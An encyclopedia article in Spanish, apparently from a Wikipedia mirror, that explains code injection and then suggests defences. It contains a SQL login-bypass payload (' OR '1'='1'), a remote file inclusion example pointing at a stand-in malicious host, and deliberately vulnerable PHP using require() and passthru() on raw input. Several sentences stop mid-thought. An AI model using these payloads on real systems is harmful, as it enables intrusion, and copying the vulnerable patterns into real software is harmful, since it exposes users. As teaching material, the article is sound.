Inyección de códigoUn defecto de inyección de código ocurre cuando es posible enviar datos inesperados a un intérprete. Estos son muy comunes en código antiguo. Se encuentran frecuentemente en consultas SQL, LDAP, Xpath o NoSQL; comandos de sistema operativo; analizadores sintácticos de XML; cabeceras SMTP; parámetros de funciones; etc. Estos defectos son fáciles de encontrar cuando se examina el código, sin embargo son difíciles de descubrir mediante pruebas funcionales. Existen utilidades de escaneo que pueden ayudar a encontrar estos defectos.[1] Una inyección de código puede resultar en la pérdida o corrupción de datos, falta de responsabilidad en acciones o denegación de acceso. Una inyección puede incluso tomar control total de un nodo. Algunos tipos de inyección de código son errores de interpretación, dando un significado especial a una introducción de datos por parte del usuario. Existen errores de interpretación similares fuera del mundo de la computación, cuando, por ejemplo, es difícil distinguir adecuadamente un nombre propio de un nombre común. De la misma forma, en algunos tipos de inyección de código puede haber un problema para diferenciar los parámetros introducidos por el usuario de los comandos del sistema. Las técnicas de inyección de código son populares en el hacking y cracking para conseguir acceder a información restringida, para aumentar los privilegios o para conseguir acceder a sistemas restringidos. Este tipo de ataques pueden ser usados con objetivos malintencionados para muchas cosas, incluyendo:
Ejemplos de inyección de códigoInyección de SQLUna inyección de código SQL se aprovecha de la sintaxis en este lenguaje para introducir comandos de manera ilícita que permitan leer o modificar la base de datos, comprometiendo el contenido de la consulta original. Por ejemplo, considerando una página web que tiene dos campos para permitir a los usuarios introducir su nombre y contraseña, el código detrás generará una consulta SQL para verificar dichos credenciales contra la lista guardada en la base de datos: SELECT ListaUsuarios.NombreUsuario
FROM ListaUsuarios
WHERE ListaUsuarios.NombreUsuario = 'NombreUsuario'
AND ListaUsuarios.Contraseña = 'Contraseña'
Si esta consulta devuelve alguna fila entonces se permite el acceso. Sin embargo, si un usuario malintencionado introduce un NombreUsuario válido e inyecta código SQL como SELECT ListaUsuarios.NombreUsuario
FROM ListaUsuarios
WHERE ListaUsuarios.NombreUsuario = 'NombreUsuario'
AND ListaUsuarios.Contraseña = 'Contraseña' OR '1'='1'
En el ejemplo anterior, la condición para validar la "Contraseña" está alterada y siempre se devolverán valores, permitiendo de esta forma el acceso de manera ilícita. Inyección de ficheroConsiderando el siguiente código PHP en una página web, el cual especifica un fichero en la petición: <?php
$color = 'azul';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
Este código espera leer ficheros del tipo azul.php o rojo.php, sin embargo alguien podría introducir $color=http://malvado.com/fichero_malintencionado forzando al código a leer el fichero php especificado. Inyección de instruccionesLa inyección de instrucciones (o inyección de intérprete de órdenes[2]) fue llamado así por las Shell de Unix, pero se aplica a la mayoría de sistemas que permitan a las aplicaciones ejecutar un intérprete de órdenes. Aquí hay un ejemplo de un script tcsh vulnerable: #!/bin/tcsh
# comprueba si el valor del primer argumento es uno
if ($1 == 1) echo coincide
Si el script anterior se guarda como el archivo ejecutable Cualquier función que pueda ser usada para componer y ejecutar una instrucción de shell es un posible vehículo de un ataque de inyección de intérprete de órdenes. Entre otras funciones tenemos Cualquier sistema Cliente-servidor como un navegador web que interactúa con un servidor web puede ser vulnerable a inyección de intérprete de órdenes. Considere el siguiente código PHP que se puede ejecutar en un servidor web para ejecutar un programa externo llamado <?php
passthru("/bin/textodivertido " . $_GET['ENTRADA_USUARIO']);
?>
La instrucción Algunos lenguajes de programación ofrecen funciones para escapar correctamente los parámetros usados para construir parámetros de las instrucciones de la línea de instrucciones: Aun así aún se impone a los programadores la responsabilidad de conocer/aprender estas funciones y recordar hacer uso de ellas cada vez que utilicen comandos de shell. Además de utilizar estas funciones, también se recomienda validar o filtrar la entrada del usuario. Una alternativa más segura es utilizar APIs que ejecuten programas externos directamente, en lugar de a través de una shell, evitando así la posibilidad de inyección de shell. Sin embargo, estas APIs tienden a no admitir varias características que proporcionan las shells y/o a ser más engorrosas/detalladas en comparación con la sintaxis de shell. Referencias
|
Portal di Ensiklopedia Dunia